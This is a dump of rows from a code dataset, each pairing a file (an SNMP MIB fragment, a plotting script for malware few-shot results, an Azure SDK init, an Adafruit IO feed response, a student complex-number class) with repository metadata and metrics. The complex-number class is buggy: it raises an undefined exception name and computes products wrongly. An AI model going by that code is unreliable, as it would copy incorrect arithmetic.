ciscoBitsClockV12R025000SW1 = ciscoBitsClockV12R025000SW1.setStatus('current')
mibBuilder.exportSymbols("CISCO-BITS-CLOCK-CAPABILITY", ciscoBitsClockCapability=ciscoBitsClockCapability, ciscoBitsClockV12R025000SW1=ciscoBitsClockV12R025000SW1, PYSNMP_MODULE_ID=ciscoBitsClockCapability)
| 102.56 | 477 | 0.793292 | 249 | 2,564 | 8.160643 | 0.477912 | 0.079232 | 0.020669 | 0.035433 | 0.358268 | 0.260827 | 0.260827 | 0.260827 | 0.260827 | 0.25 | 0 | 0.083157 | 0.076053 | 2,564 | 24 | 478 | 106.833333 | 0.774588 | 0.135725 | 0 | 0.117647 | 0 | 0 | 0.273222 | 0.03217 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.411765 | 0 | 0.411765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
3e706d4ca4ce69c37c5ac6d4eae2fc2df63f0515 | 348 | py | Python | packages/PIPS/validation/Terapix/convol3x3.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 51 | 2015-01-31T01:51:39.000Z | 2022-02-18T02:01:50.000Z | packages/PIPS/validation/Terapix/convol3x3.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 7 | 2017-05-29T09:29:00.000Z | 2019-03-11T16:01:39.000Z | packages/PIPS/validation/Terapix/convol3x3.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 12 | 2015-03-26T08:05:38.000Z | 2022-02-18T02:01:51.000Z | from __future__ import with_statement # this is to work with python2.5
import terapyps
from pyps import workspace
workspace.delete("convol3x3")
with terapyps.workspace("convol3x3.c", name="convol3x3", deleteOnClose=False,recoverInclude=False) as w:
for f in w.fun:
f.terapix_code_generation(debug=True)
# w.compile(terapyps.Maker())
| 38.666667 | 104 | 0.767241 | 49 | 348 | 5.306122 | 0.693878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02649 | 0.132184 | 348 | 8 | 105 | 43.5 | 0.834437 | 0.175287 | 0 | 0 | 0 | 0 | 0.102113 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
3e77aa2d4741af2fa6a08175efdbd41fc84d36f3 | 2,958 | py | Python | visualization/bar_line_hybrid.py | Asichurter/APISeqFewShot | b4b7843da1f53cdc1d1711537c31305e7d5c6555 | [
"MIT"
] | 8 | 2020-05-14T19:29:41.000Z | 2022-03-09T03:29:51.000Z | visualization/bar_line_hybrid.py | Asichurter/APISeqFewShot | b4b7843da1f53cdc1d1711537c31305e7d5c6555 | [
"MIT"
] | null | null | null | visualization/bar_line_hybrid.py | Asichurter/APISeqFewShot | b4b7843da1f53cdc1d1711537c31305e7d5c6555 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
# plt.style.use('ggplot')
''' Shot Accuracy Plot
ticks = [5,6,7,8,9,10,11,12,13,14,15]#[1,2,3,4,5]
data_lists = [
[92.35,92.52,93.2,93.71,93.85,94.15,94.22,94.37,94.68,94.73,94.82],
[89.15,89.74,90.41,90.88,91.31,91.47,91.84,92.03,92.2,92.3,92.48],
[86.13,86.98,87.8,88.15,88.71,89.22,89.43,89.6,89.87,90.05,90.16],
[80.04,81.38,82.39,83.09,83.61,84.21,84.6,85.16,85.35,85.79,85.99]
]#[[0.4,1.2,2.3,4,5.5]]
label_lists = [
'VirusShare_00177 5-way',
'VirusShare_00177 10-way',
'APIMDS 5-way',
'APIMDS 10-way'
]#['test1']
color_lists = ['red', 'red', 'royalblue', 'royalblue'] #['red']
marker_lists = ['o', '^', 'o', "^"]#['.']
'''
acc_data_lists = [
[91.04,91.71,92.11,92.35,91.8,91.55,90.71,91.05,90.22,90.12, 91.13, 90.32, 90.48, 90.84, 90.42, 91.14, 90.49, 90.49, 90.87, 90.77],
[87.44, 88.64, 88.7, 89.15, 88.07, 87.88, 87.77, 87.64, 87.46, 87.02, 86.93, 87.05, 86.87, 87.43, 87.56, 87.72, 87.38, 86.98, 87.31, 87.28]
]
time_data_lists = [
[14.2, 19.6, 25.1, 29.4, 36.9, 42.4, 48.8, 53.6, 58.6, 64.5, 70.1, 75.1, 80.5, 83.2, 90.5, 93.4, 100.6, 106.1, 111.5, 115.6],
[22.4, 32.0, 41.1, 50.2, 61.5, 71.4, 79.9, 89.8, 98.8, 108.5, 116.3, 122.4, 131.8, 142.6, 154.5, 164.3, 170.7, 187.9, 195.2, 201.9]
]
acc_label_lists = [
"VirusShare_00177 5-shot 5-way accuracy",
"VirusShare_00177 5-shot 10-way accuracy",
# "APIMDS 5-shot 5-way",
# "APIMDS 5-shot 10-way"
]
time_label_list = [
"VirusShare_00177 5-shot 5-way test time per episode",
"VirusShare_00177 5-shot 10-way test time per episode"
]
color_lists = ['orange', 'green']
marker_lists = ['s', 's']
bar_width = 10
ticks = np.arange(50, 1050, 50)
num_list = len(time_data_lists)
bar_ticks = [
np.arange(50, 1050, 50) - (num_list/2 - i - 0.5) * bar_width
for i in range(num_list)
]
marker_size = 6
title = ''
x_title = 'Sequence Length'
acc_y_title = 'Accuracy(%)'
time_y_title = 'ms / Episode'
fig_size = (15,6)
dpi = 300
fig = plt.figure(figsize=fig_size, dpi=dpi)
plt.xticks(ticks)
plt.title(title)
# plt.xlabel(x_title)
# plt.ylabel(y_title)
plt.grid(True, axis='y')
acc_axis = fig.add_subplot(111)
time_axis = acc_axis.twinx()
acc_axis.set_xlabel('Maximum Sequence Length')
acc_axis.set_ylabel(acc_y_title)
time_axis.set_ylabel(time_y_title)
acc_axis.set_ylim(75, 95)
time_axis.set_ylim(0, 350)
for acc_data, time_data, bar_tick, acc_label, time_label, color, marker in zip(acc_data_lists, time_data_lists, bar_ticks, acc_label_lists, time_label_list, color_lists, marker_lists):
acc_axis.plot(ticks, acc_data, color=color, marker=marker, label=acc_label, markersize=marker_size)
time_axis.bar(bar_tick, time_data, color=color, width=10, label=time_label, zorder=2)
acc_axis.legend(loc='upper left')
time_axis.legend(loc='upper right')
# plt.legend()
plt.show()
# plt.savefig('C:/Users/Asichurter/Desktop/截图/virushare.jpg', format='JPEG', dpi=300)
| 32.505495 | 184 | 0.657201 | 608 | 2,958 | 3.0625 | 0.304276 | 0.026316 | 0.042965 | 0.042965 | 0.141246 | 0.082707 | 0.030075 | 0.030075 | 0 | 0 | 0 | 0.23095 | 0.134888 | 2,958 | 90 | 185 | 32.866667 | 0.496678 | 0.069642 | 0 | 0 | 0 | 0 | 0.13093 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.039216 | 0 | 0.039216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3e91dcfe20da113c204be1e70697cf9fc4d516cc | 240 | gyp | Python | examples-rust/example1/binding.gyp | aqrln/jsfest2019-napi-rust | 02f8e75ae459c890309804c12372a016119ee462 | [
"MIT"
] | null | null | null | examples-rust/example1/binding.gyp | aqrln/jsfest2019-napi-rust | 02f8e75ae459c890309804c12372a016119ee462 | [
"MIT"
] | null | null | null | examples-rust/example1/binding.gyp | aqrln/jsfest2019-napi-rust | 02f8e75ae459c890309804c12372a016119ee462 | [
"MIT"
] | 4 | 2020-05-30T19:58:24.000Z | 2020-12-02T20:23:15.000Z | {
'targets': [
{
'target_name': 'example1',
'sources': ['manifest.c'],
'libraries': [
'../../target/release/libnapi_example1.a',
],
'include_dirs': [
'../napi/include'
]
}
]
}
| 16 | 50 | 0.433333 | 17 | 240 | 5.941176 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012739 | 0.345833 | 240 | 14 | 51 | 17.142857 | 0.630573 | 0 | 0 | 0 | 0 | 0 | 0.491667 | 0.1625 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e41ba32b99f78bd45f179b7fc569830496a91628 | 2,381 | py | Python | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/models/__init__.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | 1 | 2022-02-01T18:50:12.000Z | 2022-02-01T18:50:12.000Z | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/models/__init__.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | null | null | null | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/models/__init__.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._models_py3 import DiagnosticSettingsCategoryResource
from ._models_py3 import DiagnosticSettingsCategoryResourceCollection
from ._models_py3 import DiagnosticSettingsResource
from ._models_py3 import DiagnosticSettingsResourceCollection
from ._models_py3 import ErrorResponse
from ._models_py3 import LocalizableString
from ._models_py3 import LogSettings
from ._models_py3 import MetadataValue
from ._models_py3 import Metric
from ._models_py3 import MetricAvailability
from ._models_py3 import MetricDefinition
from ._models_py3 import MetricDefinitionCollection
from ._models_py3 import MetricSettings
from ._models_py3 import MetricValue
from ._models_py3 import ProxyOnlyResource
from ._models_py3 import Response
from ._models_py3 import RetentionPolicy
from ._models_py3 import SubscriptionDiagnosticSettingsResource
from ._models_py3 import SubscriptionDiagnosticSettingsResourceCollection
from ._models_py3 import SubscriptionLogSettings
from ._models_py3 import SubscriptionProxyOnlyResource
from ._models_py3 import TimeSeriesElement
from ._monitor_management_client_enums import (
AggregationType,
CategoryType,
ResultType,
Unit,
)
__all__ = [
'DiagnosticSettingsCategoryResource',
'DiagnosticSettingsCategoryResourceCollection',
'DiagnosticSettingsResource',
'DiagnosticSettingsResourceCollection',
'ErrorResponse',
'LocalizableString',
'LogSettings',
'MetadataValue',
'Metric',
'MetricAvailability',
'MetricDefinition',
'MetricDefinitionCollection',
'MetricSettings',
'MetricValue',
'ProxyOnlyResource',
'Response',
'RetentionPolicy',
'SubscriptionDiagnosticSettingsResource',
'SubscriptionDiagnosticSettingsResourceCollection',
'SubscriptionLogSettings',
'SubscriptionProxyOnlyResource',
'TimeSeriesElement',
'AggregationType',
'CategoryType',
'ResultType',
'Unit',
]
| 35.014706 | 94 | 0.755565 | 194 | 2,381 | 9.005155 | 0.381443 | 0.12593 | 0.163709 | 0.239267 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011074 | 0.127677 | 2,381 | 67 | 95 | 35.537313 | 0.830043 | 0.189836 | 0 | 0 | 0 | 0 | 0.271213 | 0.158251 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.410714 | 0 | 0.410714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e424d02c1c6874a3cc7557673665a4fc913a01c4 | 9,390 | py | Python | adafruit_io/adafruit_io_using_requests/feeds_response.py | brucestull/Arduino | 9ae47eabd515fb7d657f00d40b483464eca2dc65 | [
"MIT"
] | 1 | 2021-12-15T02:48:33.000Z | 2021-12-15T02:48:33.000Z | adafruit_io/adafruit_io_using_requests/feeds_response.py | brucestull/Arduino | 9ae47eabd515fb7d657f00d40b483464eca2dc65 | [
"MIT"
] | null | null | null | adafruit_io/adafruit_io_using_requests/feeds_response.py | brucestull/Arduino | 9ae47eabd515fb7d657f00d40b483464eca2dc65 | [
"MIT"
] | null | null | null |
# https://io.adafruit.com/api/v2/{username}/feeds
import pprint
headers = {'server': 'nginx', 'date': 'Sun, 06 Feb 2022 00:40:21 GMT', 'content-type': 'application/json; charset=utf-8', 'transfer-encoding': 'chunked', 'x-frame-options': 'SAMEORIGIN', 'x-xss-protection': '1; mode=block', 'x-content-type-options': 'nosniff', 'x-download-options': 'noopen', 'x-permitted-cross-domain-policies': 'none', 'referrer-policy': 'strict-origin-when-cross-origin', 'x-aio-worker': 'io-rails-1', 'access-control-allow-origin': '*', 'access-control-allow-credentials': 'false', 'access-control-request-method': '*', 'access-control-allow-methods': 'POST, PUT, DELETE, GET, OPTIONS, PATCH', 'access-control-allow-headers': 'DNT, Origin, X-Requested-With, X-AIO-Key, Content-Type, Accept, Authorization', 'access-control-expose-headers': 'X-Pagination-Limit, X-Pagination-Start, X-Pagination-End, X-Pagination-Count, X-Pagination-Total', 'access-control-max-age': '1728000', 'etag': 'W/"21ad7437c7e5f152b1505df7da75930d"', 'cache-control': 'max-age=0, private, must-revalidate', 'x-request-id': '37cbb80b-8925-4f66-89cd-df1bf01b2e62', 'x-runtime': '0.068097', 'content-encoding': 'gzip', 'x-aio-proxy': '1', 'strict-transport-security': 'max-age=31536000', 'permissions-policy': 'interest-cohort=()'}
data = [{'created_at': '2020-02-17T15:07:15Z',
'description': 'Measured temperature by the Si7021. Sensor is connected to '
'Adafruit Feather HUZZAH ESP8266.',
'enabled': True,
'feed_status_changes': [{'created_at': '2021-12-15T01:01:15Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'offline',
'to_status': 'online'},
{'created_at': '2021-11-15T13:40:10Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'online',
'to_status': 'offline'},
{'created_at': '2020-07-11T18:27:23Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'offline',
'to_status': 'online'},
{'created_at': '2020-07-09T20:40:11Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'online',
'to_status': 'offline'}],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1303967,
'key': 'temperatureesp8266',
'last_value': '69.47',
'license': None,
'name': 'Temperature ESP8266',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'online',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2022-02-06T00:39:26Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None},
{'created_at': '2020-02-17T22:04:12Z',
'description': 'Measured humidity by the Si7021. Sensor is connected to '
'Adafruit Feather HUZZAH ESP8266.',
'enabled': True,
'feed_status_changes': [{'created_at': '2021-12-15T01:01:16Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'offline',
'to_status': 'online'},
{'created_at': '2021-11-15T13:40:10Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'online',
'to_status': 'offline'},
{'created_at': '2020-07-11T18:27:23Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'offline',
'to_status': 'online'},
{'created_at': '2020-07-09T20:40:11Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'online',
'to_status': 'offline'}],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1304178,
'key': 'humidityesp8266',
'last_value': '31.4',
'license': None,
'name': 'Humidity ESP8266',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'online',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2022-02-06T00:39:26Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None},
{'created_at': '2021-12-15T01:11:12Z',
'description': 'Measured humidity by the Si7021 sensor connected to Adafruit '
'Feather Huzzah 32.',
'enabled': True,
'feed_status_changes': [],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1767912,
'key': 'humidityesp32',
'last_value': '33.0',
'license': None,
'name': 'Humidity ESP32',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'online',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2022-02-06T00:39:52Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None},
{'created_at': '2021-12-15T01:14:28Z',
'description': 'Measured temperature by the Si7021 sensor connected to '
'Adafruit Feather Huzzah32.',
'enabled': True,
'feed_status_changes': [],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1767913,
'key': 'temperatureesp32',
'last_value': '66.86',
'license': None,
'name': 'Temperature ESP32',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'online',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2022-02-06T00:39:49Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None},
{'created_at': '2021-12-15T01:16:13Z',
'description': 'Measured battery voltage of battery connected to Adafruit '
'Feather Huzzah32.',
'enabled': True,
'feed_status_changes': [],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1767914,
'key': 'batteryvoltageesp32',
'last_value': '4.69',
'license': None,
'name': 'Battery Voltage of ESP32',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'online',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2022-02-06T00:39:55Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None},
{'created_at': '2021-12-16T22:46:17Z',
'description': 'Feed for toggling the LED.',
'enabled': True,
'feed_status_changes': [{'created_at': '2021-12-27T09:40:10Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'online',
'to_status': 'offline'}],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1769478,
'key': 'toggle-led',
'last_value': 'ON',
'license': None,
'name': 'Toggle LED',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'offline',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2021-12-27T09:40:10Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None}]
# pprint.pprint(data)
# print(len(data))
# pprint.pprint(data[0])
# pprint.pprint(data[0]['created_at'])
for data_point in data:
print(data_point['updated_at'])
print(data_point['description'])
print(data_point['id'])
print(data_point['last_value']) | 38.962656 | 1,223 | 0.538552 | 981 | 9,390 | 5 | 0.236493 | 0.033028 | 0.024465 | 0.04159 | 0.666667 | 0.665443 | 0.653619 | 0.641386 | 0.60632 | 0.597554 | 0 | 0.098247 | 0.276997 | 9,390 | 241 | 1,224 | 38.962656 | 0.624245 | 0.015335 | 0 | 0.767544 | 0 | 0.008772 | 0.508658 | 0.055195 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.004386 | 0 | 0.004386 | 0.02193 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e427db39d3949d3b4b0e8b7d7f6cf8c9bff32599 | 2,071 | py | Python | assignment_3/complex.py | slchangtw/Advanced_Programming_in_Python_Jacobs | 46df6a77e23d92fc97c15b6112a3f428b2bbcb42 | [
"MIT"
] | null | null | null | assignment_3/complex.py | slchangtw/Advanced_Programming_in_Python_Jacobs | 46df6a77e23d92fc97c15b6112a3f428b2bbcb42 | [
"MIT"
] | null | null | null | assignment_3/complex.py | slchangtw/Advanced_Programming_in_Python_Jacobs | 46df6a77e23d92fc97c15b6112a3f428b2bbcb42 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# JTSK-350112
# complex.py
# Shun-Lung Chang
# sh.chang@jacobs-university.de
class Complex(object):
def __init__(self, real, imag):
self._real = real
self._imag = imag
def __add__(self, other):
if type(self) != type(other):
raise raiseTypeError('Type of {0} is not same as Type of {1}'.format(type(self),
type(other)))
return Complex(self._real + other._real, self._imag + other._imag)
def __sub__(self, other):
if type(self) != type(other):
raise raiseTypeError('Type of {0} is not same as Type of {1}'.format(type(self),
type(other)))
return Complex(self._real - other._real, self._imag - other._imag)
def __mul__(self, other):
if type(self) != type(other):
raise raiseTypeError('Type of {0} is not same as Type of {1}'.format(type(self),
type(other)))
return Complex(self._real * other._real - self._imag * other._imag,
self._real * other._imag + other._real * other._real)
def __truediv__(self, other):
if type(self) != type(other):
raise raiseTypeError('Type of {0} is not same as Type of {1}'.format(type(self),
type(other)))
return Complex((self._real * other._real + self._imag * other._imag) /
(other._real ** 2 + other._imag ** 2),
(self._imag * other._real - self._real * other._imag) /
(other._real ** 2 + other._imag ** 2))
def __str__(self):
return "Real Part: {0:.2f}\nImaginary Part: {1:.2f}".format(self._real, self._imag)
| 41.42 | 94 | 0.468856 | 222 | 2,071 | 4.121622 | 0.216216 | 0.078689 | 0.104918 | 0.148634 | 0.718033 | 0.718033 | 0.680874 | 0.680874 | 0.627322 | 0.627322 | 0 | 0.019769 | 0.41381 | 2,071 | 50 | 95 | 41.42 | 0.733937 | 0.05408 | 0 | 0.4 | 0 | 0 | 0.099795 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.033333 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e436572a81b7f2dfc45ed253e13b54249a9f1cda | 1,342 | py | Python | think/skills/tests/test_arithmetic.py | kat-dearstyne/think | 1f6de81b694e05996948639b7f7ce14b6dd4ecae | [
"MIT"
] | 2 | 2018-04-18T11:14:19.000Z | 2020-07-23T16:25:41.000Z | think/skills/tests/test_arithmetic.py | kat-dearstyne/think | 1f6de81b694e05996948639b7f7ce14b6dd4ecae | [
"MIT"
] | 1 | 2019-02-08T15:11:50.000Z | 2019-04-30T10:14:46.000Z | think/skills/tests/test_arithmetic.py | kat-dearstyne/think | 1f6de81b694e05996948639b7f7ce14b6dd4ecae | [
"MIT"
] | 1 | 2020-12-20T17:43:40.000Z | 2020-12-20T17:43:40.000Z | # import unittest
# from think import Agent, Arithmetic, Memory, Speech
# class ArithmeticTest(unittest.TestCase):
# def test_arithmetic(self):
# agent = Agent(output=False)
# arithmetic = Arithmetic(agent, Memory(agent), Speech(agent))
# arithmetic.count_to(5)
# self.assertEqual(0, arithmetic.add(0, 0))
# self.assertEqual(5, arithmetic.add(2, 3))
# self.assertEqual(17, arithmetic.add(8, 9))
# self.assertEqual(0, arithmetic.multiply(0, 0))
# self.assertEqual(0, arithmetic.multiply(7, 0))
# self.assertEqual(12, arithmetic.multiply(3, 4))
# self.assertEqual(121, arithmetic.multiply(11, 11))
# class NumbersTest(unittest.TestCase):
# TEST_PAIRS = [(0, "zero"), (1, "one"), (-4, "negative four"),
# (53, "fifty-three"),
# (129, "one hundred twenty-nine"),
# (2463, "two thousand four hundred sixty-three"),
# (7000008, "seven million eight")]
# def test_num_to_text(self):
# agent = Agent()
# arithmetic = Arithmetic(agent, Memory(agent), Speech(agent))
# errors = 0
# for pair in NumbersTest.TEST_PAIRS:
# if arithmetic.num_to_text(pair[0]) != pair[1]:
# errors += 1
# self.assertEqual(errors, 0)
| 35.315789 | 70 | 0.581967 | 151 | 1,342 | 5.112583 | 0.410596 | 0.15544 | 0.062176 | 0.101036 | 0.209845 | 0.121762 | 0.121762 | 0 | 0 | 0 | 0 | 0.053224 | 0.271982 | 1,342 | 37 | 71 | 36.27027 | 0.73695 | 0.95082 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.